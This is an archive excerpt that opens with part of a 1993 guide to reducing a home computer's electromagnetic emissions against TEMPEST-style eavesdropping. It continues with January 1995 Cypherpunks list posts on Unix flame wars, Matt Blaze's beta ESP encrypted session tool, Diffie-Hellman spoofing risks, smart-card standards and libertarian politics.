Its goal is to limit an opponent's capability to collect information about
the internal data flow of computer equipment. Most information concerning
TEMPEST specifications is classified by the United States Government and
is not available for use by its citizens.

The reason why TEMPEST technology is particularly important for
computers and other data processing equipment is the kinds of signals
components in a computer use to talk to each other ("square waves") and
their clock speeds (measured in megahertz) produce a particularly rich set
of unintentional signals in a wide portion of the electromagnetic spectrum.
Because the spurious emissions occupy so wide a portion of that spectrum,
technologies used to block one portion of the spectrum (as pulling the shades 
closed on a window to stop the visible light portion) are not necessarily
effective in another portion.

Unintentional emissions from a computer system can be captured and
processed to reveal information about the target systems from simple
levels of activity to even remotely copying keystrokes or capturing
monitor information. It is speculated that poorly protected systems can
be effectively monitored up to the order of one kilometer from the target
equipment.

This note will examine some practical aspects of reducing the
susceptibility of your personal computer equipment to remote monitoring
using easily-installed, widely available after-market components.


   I

One way of looking at TEMPEST from the lay person's point-of-view is
that it is virtually identical to the problem of preventing electromagnetic
interference ("EMI") by your computer system to others' radios, televisions,
or other consumer electronics. That is, preventing the emission of wide-band
radio "hash" from your computers, cabling, and peripherals both prevents
interference to you and your neighbors television set and limits the useful
signal available to a person surreptitiously monitoring.

Viewing the problem in this light, there are quite a few useful documents
available form the government and elsewhere attacking this problem and
providing a wealth of practical solutions and resources. Very useful for the
lay person are:

Radio Frequency Interference: How to Find It and Fix It. Ed Hare, KA1CV
and Robert Schetgen, KU7G, editors
The American Radio Relay League, Newington , CT
ISBN 0-87259-375-4  (c) 1991, second printing 1992

Federal Communications Commission Interference Handbook 
(1991)
FCC Consumers Assistance Branch
Gettysburg, PA  17326
717-337-1212
and
MIL-STD-188-124B in preparation
(includes information on military shielding of tactical 
communications systems)
Superintendent of Documents
US Government Printing Office
Washington, DC  20402
202-783-3238

Information on shielding a particular piece of consumer 
electronic equipment may be available from the:

Electronic Industries Association (EIA)
2001 Pennsylvania Ave NW
Washington, DC  20006


Preventing unintended electromagnetic emissions is a relative term.
It is not feasible to reduce to zero all unintended emissions. My personal
goal, for example, might be to reduce the amount and quality of spurious
emission until the monitoring van a kilometer away would have to be in my
front yard before it could effectively eavesdrop on my computer. Apartment
dwellers with unknown neighbors only inches away (through a wall) might
want to even more carefully adopt as many of the following suggestions as
possible since signal available for detection decreases as approximately the
inverse square of the distance from the monitoring equipment to your computer.


   II
   Start with computer equipment that meets modern standards for emission.

In the United States, the "quietest" standard for computers and peripherals
is known as the "class B" level. (Class A level is a less stringent standard
for computers to be use in a business environment.).

You want to verify that all computers and peripherals you use meet the class
B standard which permits only one-tenth the power of spurious emissions than
the class A standard. If you already own computer equipment with an FCC ID,
you can find out which standard applies. Contact the FCC Consumers Assistance
Branch at 1-717-337-1212 for details in accessing their database.

Once you own good equipment, follow the manufacturer's recommendations for
preserving the shielding integrity of the system. Don't operated the system
with the cover off and keep "slot covers" in the back of the computer in
place.


   III
   Use only shielded cable for all system interconnections.

A shielded cable surrounds the core of control wires with a metal braid or
foil to keep signals confined to that core. In the late seventies it was common
to use unshielded cable such as "ribbon" cable to connect the computer with, 
say, a diskette drive. Unshielded cable acts just like an antenna for signals
generated by your computer and peripherals. Most computer manufacturer
supply shielded cable for use with their computers in order to meet FCC
standards. Cables bought from third-parties are an unknown and should be
avoided (unless you are willing to take one apart to see for yourself!)
	
Try to avoid a "rat's nest" of wire and cabling behind your equipment and
by keeping all cables as short as possible. You want to reduced the length of
unintended antennas and to more easily predict the likely paths of electric
and magnetic coupling from cable to cable so that it can be more effectively
filtered.


   IV
   Block radiation from the power cord(s) into the house wiring.

Most computers have an EMI filter built into their body where the AC
line cord enters the power supply. This filter is generally insufficient to
prevent substantial re-radiation of EMI voltages back into the power wiring
of your house and neighborhood. To reduce the power retransmitted down
the AC power cords of your equipment, plug them in to special EMI filters
that are in turn plugged into the wall socket. I use a model 475-3
overvoltage and EMI filter manufactured by

Industrial Communication Engineers, Ltd.
P.O. Box 18495
Indianapolis, IN  46218-0495
1-800-ICE-COMM
ask for their package of free information sheets

(AC and other filters mentioned in this note are available from a wide
variety of sources including, for example, Radio Shack. I am enthusiastic
about ICE because of the "over-designed" quality of their equipment.
Standard disclaimers apply.)

This particular filter from ICE is specified to reduce retransmission of
EMI by a factor of at least 1000 in its high-frequency design range. Although
ideally every computer component using an AC line cord ought to be filtered,
it is especially important for the monitor and computer CPU to be filtered in
this manner as the most useful information available to opponents is believed
to come from these sources.


   V
   Block retransmitted information from entering your fax/modem or 
   telephone line.

Telephone line is generally very poorly shielded. EMI  from your computer
can be retransmitted directly into the phone line through your modem or can
be unintentionally picked up by the magnetic portion of the EMI spectrum
through magnetic induction from power supplies or the yoke of your cathode
ray tube "CRT" monitor.

To prevent direct retransmission, EMI filters are specifically designed for
modular telephone jacks to mount at the telephone or modem, and for
mounting directly at the service entrance to the house.

Sources of well-designed telephone-line filter products include ICE
(address above) and

K-COM
Box 82
Randolph, OH  44265
216-325-2110

Your phone company or telephone manufacturer may be able to supply
you with free modular filters, although the design frequencies of these
filters may not be high enough to be effective through much of the EMI 
spectrum of interest. Keep telephone lines away from power supplies of
computers or peripherals and the rear of CRTs:  the magnetic field often
associated with those device can inductively transfer to unshielded lines
just as if the telephone line were directly electrically connected to them. 
Since this kind of coupling decreases rapidly with distance, this kind of
magnetic induction can be virtually eliminated by keeping as much distance
(several feet or more) as possible between the power supply/monitor yoke
and cabling.


   VI
   Use ferrite toroids and split beads to prevent EMI from escaping on
   the surface of your cables.

Ferrites are magnetic materials that,  for certain ranges of EMI
frequencies, attenuate the EMI by causing it to spend itself in heat in
the material rather than continuing down the cable. They can be applied
without cutting the cable by snapping together a "split bead" form over
a thick cable such as a power cord or by threading  thinner cable such as
telephone several times around the donut-shaped ferrite form. Every cable
leaving your monitor, computer, mouse, keyboard, and other computer
peripherals should have at least one ferrite core attentuator. Don't forget
the telephone lines from your fax, modem, telephone or the unshielded DC
power cord to your modem. Ferrites are applied as close to the EMI emitting
device as possible so as to afford the least amount of cable that can act as
an antenna for the EMI.


Good sources for ferrite split beads and toroids include

Amidon Associates, Inc.
P.O. Box 956
Torrance, CA  90508
310-763-5770
(ask for their free information sheet)

Palomar Engineers
P.O. Box 462222
Escondido, CA  92046
619-747-3343
(ask for their free RFI information sheet)

and Radio Shack.


   VII
   Other practical remedies.

Other remedies that are somewhat more difficult to correctly apply
include providing a good EMI "ground" shield for your computer equipment
and other more intrusive filters such as bypass capacitor filters.

You probably ought not to think about adding bypass capacitors unless you
are familiar with electronic circuits and digital design. While quite
effective, added improperly to the motherboard or cabling of a computer they
can "smooth out" the square wave digital waveform -- perhaps to the extent
that signals are interpreted erroneously causing mysterious "crashes" of
your system. In other cases, bypass capacitors can cause unwanted parasitic
oscillation on the transistorized output drivers of certain circuits which
could damage or destroy those circuits in the computer or peripherals. Also,
unlike ferrite toroids, adding capacitors requires actually physically
splicing them in or soldering them into circuits. This opens up the
possibility of electric shock, damage to other electronic components or
voiding the warranty on the computer equipment.

A good EMI ground is difficult to achieve. Unlike an electrical safety
ground, such as the third wire in a three-wire AC power system, the EMI
ground must operate effectively over a much wider part of the EMI spectrum.
This effectiveness is related to a quality known as electrical impedance. You
desire to reduce the impedance to as low a value as possible over the entire
range of EMI frequencies. 
	
Unlike the AC safety ground, important factors in achieving low impedance
include having as short a lead from the equipment to a good EMI earth ground
as possible (must be just a few feet); the gauge of the connecting lead (the
best EMI ground lead is not wire but woven grounding "strap" or wide copper
flashing sheets; and the physical coupling of the EMI into the actual earth
ground. An 8 ft. copper-plated ground may be fine for AC safety ground, but
may present appreciable impedance resistance to an EMI voltage. Much better
would be to connect a network of six to eight copper pipes arranged in a
six-foot diameter circle driven in a foot or two into the ground,
electrically bonded together with heavy ground strap and connected to the
equipment to be grounded via a short (at most, several feet), heavy (at
least 3/4-1" wide) ground strap.
	
If you can achieve a good EMI ground, then further shielding possibilities
open up for you such as surrounding your monitor and computer equipment in a
wire-screen Faraday cage. You want to use mesh rather than solid sheet
because you must preserve the free flow of cooling air to your equipment.
Buy aluminum (not nylon) screen netting at your local hardware store. This
netting typically comes in rolls 36" wide by several feet long. Completely
surround your equipment you want to reduce the EMI being careful to make
good electrical bonds between the different panels of netting and your good
earth ground. I use stainless steel nuts, bolts, and lock washers along with
special non-oxidizing electrical paste (available from Electrical
contractors supply houses or from ICE) to secure my ground strapping to my
net "cages".  A good Faraday cage will add several orders of magnitude of
EMI attenuation to your system.


   VIII
   Checking the effectiveness of your work.

It is easy to get a general feeling about the effectiveness of your EMI
shielding work with an ordinary portable AM radio. Bring it very close to
the body of your computer and its cables in turn. Ideally, you should not
hear an increased level of static. If you do hear relatively more at one
cable than at another, apply more ferrite split beads or obtain better
shielded cable for this component. The practice of determining what kind of
operating system code is executing by listening to a nearby AM radio is
definitely obsolete for an well-shielded EMI-proof system!

To get an idea of the power and scope of your magnetic field emissions, an
ordinary compass is quite sensitive in detecting fields. Bring a compass
within a few inches of the back of your monitor and see whether it is
deflected. Notice that the amount of deflection decreases rapidly with
distance. You want to keep cables away from magnetic sources about as far as
required not to see an appreciable deflection on the compass.


   VIIII
   Summary

If you start with good, shielded equipment that has passed the FCC level B
emission standard then you are off to a great start. You may even be able to
do even better with stock OEM equipment by specifying "low-emission"
monitors that have recently come on the market in response to consumer fears
of extremely low frequency ("ELF") and other electromagnetic radiation.
Consistently use shielded cables, apply filtering and ferrite toroids to all
cabling entering or leaving your computer equipment. Finally, consider a
good EMI ground and Faraday cages. Beyond this there are even more effective
means of confining the electrical and magnetic components of your system
through the use of copper foil adhesive tapes, conductive paint sprays, "mu
metal" and other less common components.


Copyright (c) 1993 by Grady Ward. All Rights Reserved.
Permission is granted for free electronic distribution.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 30 Jan 95 10:45:48 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <9501301407.AA23479@snark.imsi.com>
Message-ID: <Pine.3.89.9501301030.A25404-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Jan 1995, Perry E. Metzger wrote:

> Date: Mon, 30 Jan 1995 09:07:37 -0500
> From: Perry E. Metzger <perry@imsi.com>
> To: cypherpunks@toad.com
> Subject: Re: alt.religion.your.operating.system.sucks 
> 
> 
> I'd have replied in private mail, but Mr. Embarassing here can't be
> reached by mail...
> 
> anonymous-remailer@shell.portal.com says:
> > Well, maybe unix gets its reputation for being hostile because of
> > things like 
> > 
> > * many commands don't work fully (find, for example)
> 
> Haven't found a bug in find since '85.
> 
> > * a large portion choke on input that isn't "expected"
> 
> Such as?

Perry,  I listed a huge number of the things that anonymous
is complaining about, under the thread heading "Even more 
holy war on unix"

I listed them precisely in response to flames like yours
challenging me to name such things.

If you ask "Such as" then someone is going to answer again.

The Holy Warriors of the Sacred Unix demand facts, then
scream like nasty children when someone answers this demand.

They say "Put up or shut up", and then send a torrent of 
savage hate mail when somebody puts up.



 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Mon, 30 Jan 95 08:01:55 PST
To: cypherpunks@toad.com
Subject: ESP Unix encrypted session protocol software
Message-ID: <9501301554.AA08155@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Folks,

I'm releasing, for experimental use, source code for a preliminary
version of my simple Unix->Unix encrypted terminal session manager,
ESP.  Basically, ESP provides a pseudo-terminal interface to a local
shell session that you can use to establish an encrypted terminal
session with a another, remote machine.  (See the README file below
for usage examples).  Once the bugs are shaken out, ESP will become
part of my CFS package, which will eventually grow into a larger
suite of free, practical tools for secure internetworked computing.
At the present time, I'm just releasing a "pre-release" to small
groups, including interested folks on the cypherpunks list.

I've tested ESP under BSDI and SunOS 4.x; you'll also need RSAREF 2.0
(from rsa.com) to compile it.  You're on your own for other platforms.
This release is NOT production software; it is by no means "ready for
prime time".  It's slow (reduces bandwidth by 50% and takes 45 seconds
to start up).  The user interface needs a bit of work, and you really
have to know what's going on to make effective use of it.  Future
versions of ESP will use a more efficient encoding and will add
features like a "palmtop" mode that allows secure remote entry of
things like passwords from dumb terminals with the encryption done on
a disconnected palmtop machine.  I hope to eventually have a PC
terminal client as well.  This version, however, only supports
Unix->Unix terminal sessions.

Because of export restrictions (and a large cabal of paranoid, rabid
lawyers watching my every move), I'm not able to send ESP out of the
US or Canada or make it available by anonymous ftp.  Sorry.  If you
want a copy of the ESP-beta sources, send an Email message to
cfs@research.att.com (NOT mab@research.att.com) telling me the
following:
	- that you're in the US or Canada, and
	- that you're a US or Canadian citizen or legal permanent
	  resident, and
	- that you've read and understand the license and export
	  conditions in the README file below.

Remember, you also need to get RSAREF 2.0 to build ESP.

-matt


========================= ESP README ==============================
This is Version 0.5c (BETA) of ESP, the Encrypted Session Protocol.

 * The author of this software is Matt Blaze.
 *              Copyright (c) 1995 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software is subject to United States export controls.
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.

ESP is an encrypted session protocol layer for managing remote
encrypted sessions.  It does 1024 bit DH key exchange (from RSAREF)
and 3-des in 8bit cfb mode for the traffic encryption.  See the
man page (esp.1 in this distribution).

To compile ESP you'll need the RSAREF 2.0 library, available for free
for non-commercial use in the US and Canada from RSA Laboratories
(anonymous ftp to rsa.com for details).

Once you have RSAREF working, this distribution should compile without
problems under SunOS 4.x and BSDI; you're on your own with other platforms.

The best way to explain esp is with an example.  Here's
an encrypted session from alice to bob:

	alice$ esp
	ESP v0.5 - encrypted session protocol layer
	    by Matt Blaze, AT&T Bell Labs, January 1995
	Randomizing (takes about 45 secs)......................done
	local layer ready (run 'esp -s' on remote)
	alice$ rsh bob
	bob$ ./esp -s                                          
	ESP v0.5 - encrypted session protocol layer
	    by Matt Blaze, AT&T Bell Labs, January 1995
	Randomizing (takes about 45 secs)......................done
	remote server ready
	Starting remote side of 1024 bit key exchange.
	~~L
	Starting local key exchange.
	entering ENCRYPTED mode; type ctrl-^ to escape
	bob$
	...
	[encrypted session from alice to bob]
	...
	bob$ exit
	Press <enter> to return CLEARTEXT mode:
	bob$ exit
	alice$ 

You can also use ESP to provide an encrypted login session;
simply create a user "esp" with "esp -s -e login" as the login
shell.  (Getting this to work properly will require some tweaking
on your local system). Run esp -l on the local machine and from
there log in to the esp account on the remote machine.  Such a
configuration encrypts the real account name and password over
the network:

	alice$ esp                                  
	ESP v0.5 - encrypted session protocol layer
	    by Matt Blaze, AT&T Bell Labs, January 1995
	Randomizing (takes about 45 secs)......................done
	local layer ready (run 'esp -s' on remote)
	alice$ telnet bob
	Trying 123.45.67.12...
	Connected to bob
	Escape character is '^]'.

	bob login: esp
	ESP v0.5 - encrypted session protocol layer
	    by Matt Blaze, AT&T Bell Labs, January 1995
	Randomizing (takes about 45 secs)......................done
	remote server ready
	Starting remote side of 1024 bit key exchange.
	~~L
	Starting local key exchange.
	entering ENCRYPTED mode; type ctrl-^ to escape
	login: mab
	Password:
	bob$
	...

It's primitive and slow, but seems to work.  Comments, bug fixes,
ports to new platforms and complaints are welcome.

Matt Blaze
mab@research.att.com
(for esp or cfs questions, use cfs@research.att.com).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian Farquhar" <ianf@sydney.sgi.com>
Date: Sun, 29 Jan 95 16:03:30 PST
To: cypherpunks@toad.com
Subject: Re: CERT statement
In-Reply-To: <9501262142.AA07376@dun-dun-noodles.cam.ov.com>
Message-ID: <9501301059.ZM17103@wiley.sydney.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 26,  4:42pm, Marc Horowitz wrote:
> You're exactly right.  However, getting people to deploy real security
> systems is nearly impossible.  My company sells a kerberos system, and
> although everyone is saying they want security, nobody really
> understands what this means, and as soon as we tell them that it
> actually involves effort, they become far less interested.

To a former employer of mine, security meant using the word "security"
in as many reports as they could.  The management never committed
resources to it, and didn't seem to have a grasp of even the most
basic concepts of it, but as long as they said "security" lots of
times, they felt that they had it.

Unfortunately, this seems to be a fairly typical state of affairs
in many organisations.

						Ian.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Mon, 30 Jan 95 11:33:14 PST
To: rkmoore@iol.ie
Subject: RE: "bad" government
Message-ID: <9501301933.AA27413@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Richard K. Moore

>This has always been the case throughout history - the forces of dark, of
disinformation, have always attempted to keep true power from the hands of
the people.

So why are you on the wrong side?
.............................................................

So considering the political consequences from the use of cryptography, 
as continuously elaborated upon here, what are you doing on this list  
-  learning how to achieve a libertarian ideal?

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Mon, 30 Jan 95 12:02:47 PST
To: cypherpunks@toad.com
Subject: Re: "bad" government
Message-ID: <9501302003.AA00508@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Perry E. Metzger"

Since this isn't a list for discussion of politics, I'll simply suggest 
that this isn't the right place to discuss this.
.....................................................


. . . . . because otherwise it will interfere with reading all those 
other posts on Unix.

(You're right, of course.)
    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Mon, 30 Jan 95 09:30:32 PST
To: Ed Carp <ecarp@netcom.com>
Subject: Re: PFF's Magna Carta and the new netserfs
In-Reply-To: <m0rYr8r-0004IhC@s116.slcslip.indirect.com>
Message-ID: <9501301729.AA10636@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    From: "Ed Carp [khijol Sysadmin]" <erc@s116.slcslip.indirect.com>
    Date: Mon, 30 Jan 1995 01:07:21 -0700 (MST)
    
    > I've never figured out why governments are made out to be so
    > bad; guns, ok, but the problems of privacy we face on this list
    > have little to do with that.  Corporations can be at least as
    > bad - extreme government leads to socialism, which often retains
    > some form of citizen-participation in decision-making; the
    > corporate state, though, is exemplified in fascism, inherently
    > much less concerned about citizen's rights.

    Extreme government leads to totalitarianism, not socialism.

This statement, as well as the one to which it is a response, confuse
decision making forces in government and government control of
economic forces.  Democratic socialism, totalitarian socialism,
democratic capitalism and totalitarian capitalism are all possible, at
least theoretically.  Moving beyond theory, one could easily claim
that no truly {democratic,totalitarian,capitalist,socialist}
society/economy has ever existed.

    Governments as a whole are seen to be "bad" because they
    invariably undermine the right of the individual to make choices
    for themselves.

Unrestrained economic powers (companies, corporations, whatever) have
the same property.  This seemed to me to be a fundamental point that
Rishab was making -- and one that is often ignored in discussions of
economic libertarianism.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 30 Jan 95 12:33:02 PST
To: cypherpunks@toad.com
Subject: DON'T READ!--I'm leaving for Monte Carlo just in time
Message-ID: <199501302031.MAA16023@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Warning! This has nothing to do with cryptography, nothing to do with
Cypherpunks, nothing to do with this list. Therefore. I'm going to
write several message about, each one saying it'll be my last word on
the subject. And, my "DON'T READ!" will hopefully pull in the curious
and encourage them to add their two francs, whhich will give me more
opportunity to expound further.

Actually, I'm lying. I'm leaving for Monte Carlo in a few hours, to
give the paper I distributed earlier. (And I'm carrying half a dozen
DATs, each capable of holding several gigabytes of data, or hundreds
of megabytes in Stego-LSB mode. And an optical disk cartridge (holding
only a measly 128 MB). I'll let you know if French customs raises an
eyebrow upon my entry to Paris--I doubt it--or if the U.S. Federales
take note of me upon my (attempted?) return to the land of the free.)

Have a good time on your Unix flame wars...but hasn't it been done
already?

I was fortunate to be in Miami last October for the apparently
interminable "logo" debate (rosy leaves on a field of cypherpunk
azure, with crossed keys triumphant), so I hope to miss this Unix vs.
DOS vs. AmigaOS vs. Warp debate. Warped, indeed.

Have fun!

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 30 Jan 95 09:42:48 PST
To: Matt Blaze <mab@research.att.com>
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <9501301554.AA08155@merckx.info.att.com>
Message-ID: <Pine.SUN.3.91.950130124020.24102B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Jan 1995, Matt Blaze wrote:

> ESP is an encrypted session protocol layer for managing remote
> encrypted sessions.  It does 1024 bit DH key exchange (from RSAREF)
> and 3-des in 8bit cfb mode for the traffic encryption.

I'm curious what Matt and others think about the possibility of the DH key
exchange being spoofed by an interloper in this application. 

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Mon, 30 Jan 95 10:07:52 PST
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <Pine.SUN.3.91.950130124020.24102B-100000@thrash.src.umd.edu>
Message-ID: <9501301802.AA08512@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain



>On Mon, 30 Jan 1995, Matt Blaze wrote:
>
>> ESP is an encrypted session protocol layer for managing remote
>> encrypted sessions.  It does 1024 bit DH key exchange (from RSAREF)
>> and 3-des in 8bit cfb mode for the traffic encryption.
>
>I'm curious what Matt and others think about the possibility of the DH key
>exchange being spoofed by an interloper in this application. 
>
>-Thomas
>

Well, cryptographically speaking, it's trivial for an active attack and
probably infeasible for a passive attack.  But you knew that...

So there are two questions - first, what's the threat model for TCP/IP,
and second, what are the alternatives?

I'm not sure about the threat model.  Spoofing attacks on TCP sessions
are not exactly easy - there's a lot to do to pull it off - but not
out of the question either (as demonstrated by the recent NYT articles
and CERT advisories).  Probably the easiest way to receive packets intended
for another host is to convince the routing tables between you and your
victim to route to you instead of the real host.  I'm not aware of this
every being done ON PURPOSE, but it's not out of the question, either.

As for the alternatives, I think the picture is pretty bleak, to tell
the truth.  The cryptographically sound way to prevent spoofing is
with authentication of the agreed key.  But for the remote host to
authenticate itself, it has to have a secret signature key.  Where to
store it?  A typical machine, especially a multi-user, unattended server
simply has no safe place to store keys.  And if you had a trusted secure key
store on the remote host, you wouldn't really need to use Diffie-Hellman
to establish the session key in the first place, since you could just
store each user's pre-established session key in advance.

At the extreme, fixing this is a Hard Problem.  In practice for establishing
a reasonably secure session, it all depends on how much you worry about a
full-blown (two way) spoofing attack against IP.

-matt
session ke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Mon, 30 Jan 95 10:12:02 PST
To: cypherpunks@toad.com
Subject: ESP -> ESM
Message-ID: <9501301814.AA08637@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


I've just been informed that there's a reasonably confusing name
collision between my ESP and a working name for IPSP.

Grumble.

I'm easy.  ESP is now called ESM (encrypting session manager).  Everything
else is the same.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Mon, 30 Jan 95 12:23:48 PST
To: cypherpunks@toad.com
Subject: Re: "bad" government
In-Reply-To: <9501301859.AA24106@snark.imsi.com>
Message-ID: <199501302023.NAA29443@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Richard K. Moore says:
> libertarians might like the theoretical, abstract formula of "unregulated
> capital", but if you'd put down your Friedman long enough to read history,
> you'd know that it was a disaster.

Perry Metzger says:
> Before starting a giant flamewar here, let me simply note that some of
> us violently disagree with everything -- ever last detail -- of what
> you have to say -- indeed, probably the majority of people here. Since
> this isn't a list for discussion of politics, I'll simply suggest that
> this isn't the right place to discuss this.

Some others of us, however, are very happy to see that there are 
people still subscribed to this list who don't buy into the tripe that
the "majority" of the people here try to pass off as a political philosophy.

This list _ought_ to be the wrong place for politics, but it is
disingenuous to imply that politics, and pretty nutty politics at that,
doesn't consume a hefty fraction of what this list spews out. The fact
that someone expressing a moderate viewpoint is in danger of being 
flambeed is the list's problem, not Mr. Moore's.

                                 -- Will





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Mon, 30 Jan 95 23:44:57 PST
To: rfb@lehman.com
Subject: Re: PFF's Magna Carta and the new netserfs
In-Reply-To: <9501301729.AA10636@cfdevx1.lehman.com>
Message-ID: <m0rZ2mP-0004INC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


>     From: "Ed Carp [khijol Sysadmin]" <erc@s116.slcslip.indirect.com>
>     Date: Mon, 30 Jan 1995 01:07:21 -0700 (MST)
>     
>     > I've never figured out why governments are made out to be so
>     > bad; guns, ok, but the problems of privacy we face on this list
>     > have little to do with that.  Corporations can be at least as
>     > bad - extreme government leads to socialism, which often retains
>     > some form of citizen-participation in decision-making; the
>     > corporate state, though, is exemplified in fascism, inherently
>     > much less concerned about citizen's rights.
> 
>     Extreme government leads to totalitarianism, not socialism.
> 
> This statement, as well as the one to which it is a response, confuse
> decision making forces in government and government control of
> economic forces.  Democratic socialism, totalitarian socialism,
> democratic capitalism and totalitarian capitalism are all possible, at
> least theoretically.  Moving beyond theory, one could easily claim
> that no truly {democratic,totalitarian,capitalist,socialist}
> society/economy has ever existed.

I'm not about to split hairs based on one's particular implementation of labels;
rather, I would say that the labels one gives to government don't really
matter.  The purpose of government is to maximize personal freedom while at
the same time minimizing the curtailment of the personal freedoms of others.
I don't think that you can have a meaningful yardstick other than this - it
covers economic as well as social issues.

>     Governments as a whole are seen to be "bad" because they
>     invariably undermine the right of the individual to make choices
>     for themselves.
> 
> Unrestrained economic powers (companies, corporations, whatever) have
> the same property.  This seemed to me to be a fundamental point that
> Rishab was making -- and one that is often ignored in discussions of
> economic libertarianism.

Agreed, but I don't see that that was the point Rishab was making.  Oh, well..
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Mon, 30 Jan 95 13:59:34 PST
To: jcorgan@aeinet.com
Subject: Smart Card architecture
In-Reply-To: <Chameleon.4.01.950129222758.jcorgan@comet.aeinet.com>
Message-ID: <199501302138.NAA00348@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


Johnathan Corgan <jcorgan@aeinet.com> writes:
> I've been searching around the 'net looking for online references to
> the actual protocols and methods used in smart card user authentication,
> but have found very little.  I understand from reading Schneier that

There is a group of people working on a set of defacto standards for
interfacing to smart tokens.  The idea is to come up with an API that
is mostly vendor and technology independent.  The "standard" will be
published as PKCS #11 when its ready, and is known as "cryptoki",
pronounced crypto-key.  (Cryptographic Token Interface, I think...)

I think that you can find a draft copy somewhere on ftp.rsa.com under
pkcs-11 or pkcs-11-dev.  There's also a mailing list. Send subscribe
request to pkcs-11-dev-request@rsa.com

Eric Blossom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 30 Jan 95 11:00:19 PST
To: rkmoore@iol.ie (Richard K. Moore)
Subject: Re: "bad" government
In-Reply-To: <199501301838.SAA20864@GPO.iol.ie>
Message-ID: <9501301859.AA24106@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Richard K. Moore says:
> The "Third Wave" -- if you take the PFF's Magna Carta definition (and
> Toffler is one of the authors) -- is a power grab by corporations to return
> the world economy to status of the USA economy in the 1880's. You so-called
> libertarians might like the theoretical, abstract formula of "unregulated
> capital", but if you'd put down your Friedman long enough to read history,
> you'd know that it was a disaster. Unregulated capitalism is incompatible
> with a civilized societiy.

Before starting a giant flamewar here, let me simply note that some of
us violently disagree with everything -- ever last detail -- of what
you have to say -- indeed, probably the majority of people here. Since
this isn't a list for discussion of politics, I'll simply suggest that
this isn't the right place to discuss this.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 30 Jan 95 11:23:32 PST
To: Matt Blaze <mab@research.att.com>
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <9501301802.AA08512@merckx.info.att.com>
